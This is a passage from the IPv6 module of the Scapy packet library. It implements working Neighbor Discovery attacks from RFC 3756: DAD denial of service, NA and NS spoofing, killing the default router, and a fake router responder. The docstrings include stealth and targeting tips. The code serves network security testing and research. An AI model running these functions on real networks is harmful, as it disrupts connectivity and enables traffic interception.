   3344     3756. This is done by listening incoming NS messages sent from the
   3345     unspecified address and sending a NS reply for the target address,
   3346     leading the peer to believe that another node is also performing DAD
   3347     for that address.
   3349     By default, the fake NS sent to create the DoS uses:
   3350      - as target address the target address found in received NS.
   3351      - as IPv6 source address: the unspecified address (::).
   3352      - as IPv6 destination address: the link-local solicited-node multicast
   3353        address derived from the target address in received NS.
   3354      - the mac address of the interface as source (or reply_mac, see below).
   3355      - the multicast mac address derived from the solicited node multicast
   3356        address used as IPv6 destination address.
   3358     Following arguments can be used to change the behavior:
   3360     iface: a specific interface (e.g. "eth0") of the system on which the
   3361          DoS should be launched. If None is provided conf.iface is used.
   3363     mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on.
   3364          Only NS messages received from this source will trigger replies.
   3365          This allows limiting the effects of the DoS to a single target by
   3366          filtering on its mac address. The default value is None: the DoS
   3367          is not limited to a specific mac address.
   3369     tgt_filter: Same as previous but for a specific target IPv6 address for
   3370          received NS. If the target address in the NS message (not the IPv6
   3371          destination address) matches that address, then a fake reply will
   3372          be sent, i.e. the emitter will be a target of the DoS.
   3374     reply_mac: allow specifying a specific source mac address for the reply,
   3375          i.e. to prevent the use of the mac address of the interface.
   3376     """
   3378     def ns_reply_callback(req, reply_mac, iface):
   3379         """
   3380         Callback that reply to a NS by sending a similar NS
   3381         """
   3383         # Let's build a reply and send it
   3384         mac = req[Ether].src
   3385         dst = req[IPv6].dst
   3386         tgt = req[ICMPv6ND_NS].tgt
   3387         rep = Ether(src=reply_mac)/IPv6(src="::", dst=dst)/ICMPv6ND_NS(tgt=tgt)
   3388         sendp(rep, iface=iface, verbose=0)
   3390         print("Reply NS for target address %s (received from %s)" % (tgt, mac))
   3392     _NDP_Attack_DAD_DoS(ns_reply_callback, iface, mac_src_filter,
   3393                         tgt_filter, reply_mac)
   3396 def NDP_Attack_DAD_DoS_via_NA(iface=None, mac_src_filter=None, tgt_filter=None,
   3397                               reply_mac=None):
   3398     """
   3399     Perform the DAD DoS attack using NS described in section 4.1.3 of RFC
   3400     3756. This is done by listening incoming NS messages *sent from the
   3401     unspecified address* and sending a NA reply for the target address,
   3402     leading the peer to believe that another node is also performing DAD
   3403     for that address.
   3405     By default, the fake NA sent to create the DoS uses:
   3406      - as target address the target address found in received NS.
   3407      - as IPv6 source address: the target address found in received NS.
   3408      - as IPv6 destination address: the link-local solicited-node multicast
   3409        address derived from the target address in received NS.
   3410      - the mac address of the interface as source (or reply_mac, see below).
   3411      - the multicast mac address derived from the solicited node multicast
   3412        address used as IPv6 destination address.
   3413      - A Target Link-Layer address option (ICMPv6NDOptDstLLAddr) filled
   3414        with the mac address used as source of the NA.
   3416     Following arguments can be used to change the behavior:
   3418     iface: a specific interface (e.g. "eth0") of the system on which the
   3419           DoS should be launched. If None is provided conf.iface is used.
   3421     mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on.
   3422          Only NS messages received from this source will trigger replies.
   3423          This allows limiting the effects of the DoS to a single target by
   3424          filtering on its mac address. The default value is None: the DoS
   3425          is not limited to a specific mac address.
   3427     tgt_filter: Same as previous but for a specific target IPv6 address for
   3428          received NS. If the target address in the NS message (not the IPv6
   3429          destination address) matches that address, then a fake reply will
   3430          be sent, i.e. the emitter will be a target of the DoS.
   3432     reply_mac: allow specifying a specific source mac address for the reply,
   3433          i.e. to prevent the use of the mac address of the interface. This
   3434          address will also be used in the Target Link-Layer Address option.
   3435     """
   3437     def na_reply_callback(req, reply_mac, iface):
   3438         """
   3439         Callback that reply to a NS with a NA
   3440         """
   3442         # Let's build a reply and send it
   3443         mac = req[Ether].src
   3444         dst = req[IPv6].dst
   3445         tgt = req[ICMPv6ND_NS].tgt
   3446         rep = Ether(src=reply_mac)/IPv6(src=tgt, dst=dst)
   3447         rep /= ICMPv6ND_NA(tgt=tgt, S=0, R=0, O=1)
   3448         rep /= ICMPv6NDOptDstLLAddr(lladdr=reply_mac)
   3449         sendp(rep, iface=iface, verbose=0)
   3451         print("Reply NA for target address %s (received from %s)" % (tgt, mac))
   3453     _NDP_Attack_DAD_DoS(na_reply_callback, iface, mac_src_filter,
   3454                         tgt_filter, reply_mac)
   3457 def NDP_Attack_NA_Spoofing(iface=None, mac_src_filter=None, tgt_filter=None,
   3458                            reply_mac=None, router=False):
   3459     """
   3460     The main purpose of this function is to send fake Neighbor Advertisement
   3461     messages to a victim. As the emission of unsolicited Neighbor Advertisement
   3462     is pretty pointless (from an attacker standpoint) because it will not
   3463     lead to a modification of a victim's neighbor cache, the function send
   3464     advertisements in response to received NS (NS sent as part of the DAD,
   3465     i.e. with an unspecified address as source, are not considered).
   3467     By default, the fake NA sent to create the DoS uses:
   3468      - as target address the target address found in received NS.
   3469      - as IPv6 source address: the target address
   3470      - as IPv6 destination address: the source IPv6 address of received NS
   3471        message.
   3472      - the mac address of the interface as source (or reply_mac, see below).
   3473      - the source mac address of the received NS as destination macs address
   3474        of the emitted NA.
   3475      - A Target Link-Layer address option (ICMPv6NDOptDstLLAddr)
   3476        filled with the mac address used as source of the NA.
   3478     Following arguments can be used to change the behavior:
   3480     iface: a specific interface (e.g. "eth0") of the system on which the
   3481           DoS should be launched. If None is provided conf.iface is used.
   3483     mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on.
   3484          Only NS messages received from this source will trigger replies.
   3485          This allows limiting the effects of the DoS to a single target by
   3486          filtering on its mac address. The default value is None: the DoS
   3487          is not limited to a specific mac address.
   3489     tgt_filter: Same as previous but for a specific target IPv6 address for
   3490          received NS. If the target address in the NS message (not the IPv6
   3491          destination address) matches that address, then a fake reply will
   3492          be sent, i.e. the emitter will be a target of the DoS.
   3494     reply_mac: allow specifying a specific source mac address for the reply,
   3495          i.e. to prevent the use of the mac address of the interface. This
   3496          address will also be used in the Target Link-Layer Address option.
   3498     router: by the default (False) the 'R' flag in the NA used for the reply
   3499          is not set. If the parameter is set to True, the 'R' flag in the
   3500          NA is set, advertising us as a router.
   3502     Please, keep the following in mind when using the function: for obvious
   3503     reasons (kernel space vs. Python speed), when the target of the address
   3504     resolution is on the link, the sender of the NS receives 2 NA messages
   3505     in a row, the valid one and our fake one. The second one will overwrite
   3506     the information provided by the first one, i.e. the natural latency of
   3507     Scapy helps here.
   3509     In practice, on a common Ethernet link, the emission of the NA from the
   3510     genuine target (kernel stack) usually occurs in the same millisecond as
   3511     the receipt of the NS. The NA generated by Scapy6 will usually come after
   3512     something 20+ ms. On a usual testbed for instance, this difference is
   3513     sufficient to have the first data packet sent from the victim to the
   3514     destination before it even receives our fake NA.
   3515     """
   3517     def is_request(req, mac_src_filter, tgt_filter):
   3518         """
   3519         Check if packet req is a request
   3520         """
   3522         # Those simple checks are based on Section 5.4.2 of RFC 4862
   3523         if not (Ether in req and IPv6 in req and ICMPv6ND_NS in req):
   3524             return 0
   3526         mac_src = req[Ether].src
   3527         if mac_src_filter and mac_src != mac_src_filter:
   3528             return 0
   3530         # Source must NOT be the unspecified address
   3531         if req[IPv6].src == "::":
   3532             return 0
   3534         tgt = inet_pton(socket.AF_INET6, req[ICMPv6ND_NS].tgt)
   3535         if tgt_filter and tgt != tgt_filter:
   3536             return 0
   3538         dst = req[IPv6].dst
   3539         if in6_isllsnmaddr(dst): # Address is Link Layer Solicited Node mcast.
   3541             # If this is a real address resolution NS, then the destination
   3542             # address of the packet is the link-local solicited node multicast
   3543             # address associated with the target of the NS.
   3544             # Otherwise, the NS is a NUD related one, i.e. the peer is
   3545             # unicasting the NS to check the target is still alive (L2
   3546             # information is still in its cache and it is verified)
   3547             received_snma = socket.inet_pton(socket.AF_INET6, dst)
   3548             expected_snma = in6_getnsma(tgt)
   3549             if received_snma != expected_snma:
   3550                 print("solicited node multicast @ does not match target @!")
   3551                 return 0
   3553         return 1
   3555     def reply_callback(req, reply_mac, router, iface):
   3556         """
   3557         Callback that reply to a NS with a spoofed NA
   3558         """
   3560         # Let's build a reply (as defined in Section 7.2.4. of RFC 4861) and
   3561         # send it back.
   3562         mac = req[Ether].src
   3563         pkt = req[IPv6]
   3564         src = pkt.src
   3565         tgt = req[ICMPv6ND_NS].tgt
   3566         rep = Ether(src=reply_mac, dst=mac)/IPv6(src=tgt, dst=src)
   3567         rep /= ICMPv6ND_NA(tgt=tgt, S=1, R=router, O=1) # target from the NS
   3569         # "If the solicitation IP Destination Address is not a multicast
   3570         # address, the Target Link-Layer Address option MAY be omitted"
   3571         # Given our purpose, we always include it.
   3572         rep /= ICMPv6NDOptDstLLAddr(lladdr=reply_mac)
   3574         sendp(rep, iface=iface, verbose=0)
   3576         print("Reply NA for target address %s (received from %s)" % (tgt, mac))
   3578     if not iface:
   3579         iface = conf.iface
   3580     # To prevent sniffing our own traffic
   3581     if not reply_mac:
   3582         reply_mac = get_if_hwaddr(iface)
   3583     sniff_filter = "icmp6 and not ether src %s" % reply_mac
   3585     router = (router and 1) or 0 # Value of the R flags in NA
   3587     sniff(store=0,
   3588           filter=sniff_filter,
   3589           lfilter=lambda x: is_request(x, mac_src_filter, tgt_filter),
   3590           prn=lambda x: reply_callback(x, reply_mac, router, iface),
   3591           iface=iface)
   3594 def NDP_Attack_NS_Spoofing(src_lladdr=None, src=None, target="2001:db8::1",
   3595                            dst=None, src_mac=None, dst_mac=None, loop=True,
   3596                            inter=1, iface=None):
   3597     """
   3598     The main purpose of this function is to send fake Neighbor Solicitations
   3599     messages to a victim, in order to either create a new entry in its neighbor
   3600     cache or update an existing one. In section 7.2.3 of RFC 4861, it is stated
   3601     that a node SHOULD create the entry or update an existing one (if it is not
   3602     currently performing DAD for the target of the NS). The entry's reachability
   3603     state is set to STALE.
   3605     The two main parameters of the function are the source link-layer address
   3606     (carried by the Source Link-Layer Address option in the NS) and the
   3607     source address of the packet.
   3609     Unlike some other NDP_Attack_* function, this one is not based on a
   3610     stimulus/response model. When called, it sends the same NS packet in loop
   3611     every second (the default)
   3613     Following arguments can be used to change the format of the packets:
   3615     src_lladdr: the MAC address used in the Source Link-Layer Address option
   3616          included in the NS packet. This is the address that the peer should
   3617          associate in its neighbor cache with the IPv6 source address of the
   3618          packet. If None is provided, the mac address of the interface is
   3619          used.
   3621     src: the IPv6 address used as source of the packet. If None is provided,
   3622          an address associated with the emitting interface will be used
   3623          (based on the destination address of the packet).
   3625     target: the target address of the NS packet. If no value is provided,
   3626          a dummy address (2001:db8::1) is used. The value of the target
   3627          has a direct impact on the destination address of the packet if it
   3628          is not overridden. By default, the solicited-node multicast address
   3629          associated with the target is used as destination address of the
   3630          packet. Consider specifying a specific destination address if you
   3631          intend to use a target address different than the one of the victim.
   3633     dst: The destination address of the NS. By default, the solicited node
   3634          multicast address associated with the target address (see previous
   3635          parameter) is used if no specific value is provided. The victim
   3636          is not expected to check the destination address of the packet,
   3637          so using a multicast address like ff02::1 should work if you want
   3638          the attack to target all hosts on the link. On the contrary, if
   3639          you want to be more stealth, you should provide the target address
   3640          for this parameter in order for the packet to be sent only to the
   3641          victim.
   3643     src_mac: the MAC address used as source of the packet. By default, this
   3644          is the address of the interface. If you want to be more stealth,
   3645          feel free to use something else. Note that this address is not the
   3646          that the victim will use to populate its neighbor cache.
   3648     dst_mac: The MAC address used as destination address of the packet. If
   3649          the IPv6 destination address is multicast (all-nodes, solicited
   3650          node, ...), it will be computed. If the destination address is
   3651          unicast, a neighbor solicitation will be performed to get the
   3652          associated address. If you want the attack to be stealth, you
   3653          can provide the MAC address using this parameter.
   3655     loop: By default, this parameter is True, indicating that NS packets
   3656          will be sent in loop, separated by 'inter' seconds (see below).
   3657          When set to False, a single packet is sent.
   3659     inter: When loop parameter is True (the default), this parameter provides
   3660          the interval in seconds used for sending NS packets.
   3662     iface: to force the sending interface.
   3663     """
   3665     if not iface:
   3666         iface = conf.iface
   3668     # Use provided MAC address as source link-layer address option
   3669     # or the MAC address of the interface if none is provided.
   3670     if not src_lladdr:
   3671         src_lladdr = get_if_hwaddr(iface)
   3673     # Prepare packets parameters
   3674     ether_params = {}
   3675     if src_mac:
   3676         ether_params["src"] = src_mac
   3678     if dst_mac:
   3679         ether_params["dst"] = dst_mac
   3681     ipv6_params = {}
   3682     if src:
   3683         ipv6_params["src"] = src
   3684     if dst:
   3685         ipv6_params["dst"] = dst
   3686     else:
   3687         # Compute the solicited-node multicast address
   3688         # associated with the target address.
   3689         tmp = inet_ntop(socket.AF_INET6,
   3690                         in6_getnsma(inet_pton(socket.AF_INET6, target)))
   3691         ipv6_params["dst"] = tmp
   3693     pkt = Ether(**ether_params)
   3694     pkt /= IPv6(**ipv6_params)
   3695     pkt /= ICMPv6ND_NS(tgt=target)
   3696     pkt /= ICMPv6NDOptSrcLLAddr(lladdr=src_lladdr)
   3698     sendp(pkt, inter=inter, loop=loop, iface=iface, verbose=0)
   3701 def NDP_Attack_Kill_Default_Router(iface=None, mac_src_filter=None,
   3702                                    ip_src_filter=None, reply_mac=None,
   3703                                    tgt_mac=None):
   3704     """
   3705     The purpose of the function is to monitor incoming RA messages
   3706     sent by default routers (RA with a non-zero Router Lifetime values)
   3707     and invalidate them by immediately replying with fake RA messages
   3708     advertising a zero Router Lifetime value.
   3710     The result on receivers is that the router is immediately invalidated,
   3711     i.e. the associated entry is discarded from the default router list
   3712     and destination cache is updated to reflect the change.
   3714     By default, the function considers all RA messages with a non-zero
   3715     Router Lifetime value but provides configuration knobs to allow
   3716     filtering RA sent by specific routers (Ethernet source address).
   3717     With regard to emission, the multicast all-nodes address is used
   3718     by default but a specific target can be used, in order for the DoS to
   3719     apply only to a specific host.
   3721     More precisely, following arguments can be used to change the behavior:
   3723     iface: a specific interface (e.g. "eth0") of the system on which the
   3724          DoS should be launched. If None is provided conf.iface is used.
   3726     mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on.
   3727          Only RA messages received from this source will trigger replies.
   3728          If other default routers advertised their presence on the link,
   3729          their clients will not be impacted by the attack. The default
   3730          value is None: the DoS is not limited to a specific mac address.
   3732     ip_src_filter: an IPv6 address (e.g. fe80::21e:bff:fe4e:3b2) to filter
   3733          on. Only RA messages received from this source address will trigger
   3734          replies. If other default routers advertised their presence on the
   3735          link, their clients will not be impacted by the attack. The default
   3736          value is None: the DoS is not limited to a specific IPv6 source
   3737          address.
   3739     reply_mac: allow specifying a specific source mac address for the reply,
   3740          i.e. to prevent the use of the mac address of the interface.
   3742     tgt_mac: allow limiting the effect of the DoS to a specific host,
   3743          by sending the "invalidating RA" only to its mac address.
   3744     """
   3746     def is_request(req, mac_src_filter, ip_src_filter):
   3747         """
   3748         Check if packet req is a request
   3749         """
   3751         if not (Ether in req and IPv6 in req and ICMPv6ND_RA in req):
   3752             return 0
   3754         mac_src = req[Ether].src
   3755         if mac_src_filter and mac_src != mac_src_filter:
   3756             return 0
   3758         ip_src = req[IPv6].src
   3759         if ip_src_filter and ip_src != ip_src_filter:
   3760             return 0
   3762         # Check if this is an advertisement for a Default Router
   3763         # by looking at Router Lifetime value
   3764         if req[ICMPv6ND_RA].routerlifetime == 0:
   3765             return 0
   3767         return 1
   3769     def ra_reply_callback(req, reply_mac, tgt_mac, iface):
   3770         """
   3771         Callback that sends an RA with a 0 lifetime
   3772         """
   3774         # Let's build a reply and send it
   3776         src = req[IPv6].src
   3778         # Prepare packets parameters
   3779         ether_params = {}
   3780         if reply_mac:
   3781             ether_params["src"] = reply_mac
   3783         if tgt_mac:
   3784             ether_params["dst"] = tgt_mac
   3786         # Basis of fake RA (high pref, zero lifetime)
   3787         rep = Ether(**ether_params)/IPv6(src=src, dst="ff02::1")
   3788         rep /= ICMPv6ND_RA(prf=1, routerlifetime=0)
   3790         # Add it a PIO from the request ...
   3791         tmp = req
   3792         while ICMPv6NDOptPrefixInfo in tmp:
   3793             pio = tmp[ICMPv6NDOptPrefixInfo]
   3794             tmp = pio.payload
   3795             del(pio.payload)
   3796             rep /= pio
   3798         # ... and source link layer address option
   3799         if ICMPv6NDOptSrcLLAddr in req:
   3800             mac = req[ICMPv6NDOptSrcLLAddr].lladdr
   3801         else:
   3802             mac = req[Ether].src
   3803         rep /= ICMPv6NDOptSrcLLAddr(lladdr=mac)
   3805         sendp(rep, iface=iface, verbose=0)
   3807         print("Fake RA sent with source address %s" % src)
   3810     if not iface:
   3811         iface = conf.iface
   3812     # To prevent sniffing our own traffic
   3813     if not reply_mac:
   3814         reply_mac = get_if_hwaddr(iface)
   3815     sniff_filter = "icmp6 and not ether src %s" % reply_mac
   3817     sniff(store=0,
   3818           filter=sniff_filter,
   3819           lfilter=lambda x: is_request(x, mac_src_filter, ip_src_filter),
   3820           prn=lambda x: ra_reply_callback(x, reply_mac, tgt_mac, iface),
   3821           iface=iface)
   3824 def NDP_Attack_Fake_Router(ra, iface=None, mac_src_filter=None,
   3825                            ip_src_filter=None):
   3826     """
   3827     The purpose of this function is to send provided RA message at layer 2
   3828     (i.e. providing a packet starting with IPv6 will not work) in response
   3829     to received RS messages. In the end, the function is a simple wrapper
   3830     around sendp() that monitor the link for RS messages.
   3832     It is probably better explained with an example:
   3834       >>> ra  = Ether()/IPv6()/ICMPv6ND_RA()
   3835       >>> ra /= ICMPv6NDOptPrefixInfo(prefix="2001:db8:1::", prefixlen=64)
   3836       >>> ra /= ICMPv6NDOptPrefixInfo(prefix="2001:db8:2::", prefixlen=64)
   3837       >>> ra /= ICMPv6NDOptSrcLLAddr(lladdr="00:11:22:33:44:55")
   3838       >>> NDP_Attack_Fake_Router(ra, iface="eth0")
   3839       Fake RA sent in response to RS from fe80::213:58ff:fe8c:b573
   3840       Fake RA sent in response to RS from fe80::213:72ff:fe8c:b9ae
   3841       ...
   3843     Following arguments can be used to change the behavior:
   3845       ra: the RA message to send in response to received RS message.
   3847       iface: a specific interface (e.g. "eth0") of the system on which the
   3848              DoS should be launched. If none is provided, conf.iface is
   3849              used.
   3851       mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on.
   3852          Only RS messages received from this source will trigger a reply.
   3853          Note that no changes to provided RA is done which imply that if
   3854          you intend to target only the source of the RS using this option,
   3855          you will have to set the Ethernet destination address to the same
   3856          value in your RA.
   3857          The default value for this parameter is None: no filtering on the
   3858          source of RS is done.
   3860     ip_src_filter: an IPv6 address (e.g. fe80::21e:bff:fe4e:3b2) to filter
   3861          on. Only RS messages received from this source address will trigger
   3862          replies. Same comment as for previous argument apply: if you use
   3863          the option, you will probably want to set a specific Ethernet
   3864          destination address in the RA.
   3865     """
   3867     def is_request(req, mac_src_filter, ip_src_filter):
   3868         """
   3869         Check if packet req is a request
   3870         """
   3872         if not (Ether in req and IPv6 in req and ICMPv6ND_RS in req):
   3873             return 0
   3875         mac_src = req[Ether].src
   3876         if mac_src_filter and mac_src != mac_src_filter:
   3877             return 0
   3879         ip_src = req[IPv6].src
   3880         if ip_src_filter and ip_src != ip_src_filter:
   3881             return 0
   3883         return 1
   3885     def ra_reply_callback(req, iface):
   3886         """
   3887         Callback that sends an RA in reply to an RS
   3888         """
   3890         src = req[IPv6].src
   3891         sendp(ra, iface=iface, verbose=0)
   3892         print("Fake RA sent in response to RS from %s" % src)
   3894     if not iface:
   3895         iface = conf.iface
   3896     sniff_filter = "icmp6"
   3898     sniff(store=0,
   3899           filter=sniff_filter,
   3900           lfilter=lambda x: is_request(x, mac_src_filter, ip_src_filter),
   3901           prn=lambda x: ra_reply_callback(x, iface),
   3902           iface=iface)
   3905 #############################################################################
   3906 #############################################################################
   3907 ###                          Layers binding                               ###
   3908 #############################################################################
   3909 #############################################################################
   3911 conf.l3types.register(ETH_P_IPV6, IPv6)
   3912 conf.l2types.register(31, IPv6)
   3913 conf.l2types.register(DLT_IPV6, IPv6)
   3914 conf.l2types.register(DLT_RAW, _IPv46)
   3915 conf.l2types.register_num2layer(DLT_RAW_ALT, _IPv46)
   3917 bind_layers(Ether,     IPv6,     type = 0x86dd )
   3918 bind_layers(CookedLinux, IPv6,   proto = 0x86dd )
   3919 bind_layers(GRE,       IPv6,     proto = 0x86dd )
   3920 bind_layers(SNAP,      IPv6,     code = 0x86dd )
   3921 bind_layers(Loopback,  IPv6,     type = 0x1c )
   3922 bind_layers(IPerror6,  TCPerror, nh = socket.IPPROTO_TCP )
   3923 bind_layers(IPerror6,  UDPerror, nh = socket.IPPROTO_UDP )
   3924 bind_layers(IPv6,      TCP,      nh = socket.IPPROTO_TCP )
   3925 bind_layers(IPv6,      UDP,      nh = socket.IPPROTO_UDP )
   3926 bind_layers(IP,        IPv6,     proto = socket.IPPROTO_IPV6 )
   3927 bind_layers(IPv6,      IPv6,     nh = socket.IPPROTO_IPV6 )
   3928 bind_layers(IPv6,      IP,       nh = socket.IPPROTO_IPIP )
   3929 bind_layers(IPv6,      GRE,      nh = socket.IPPROTO_GRE )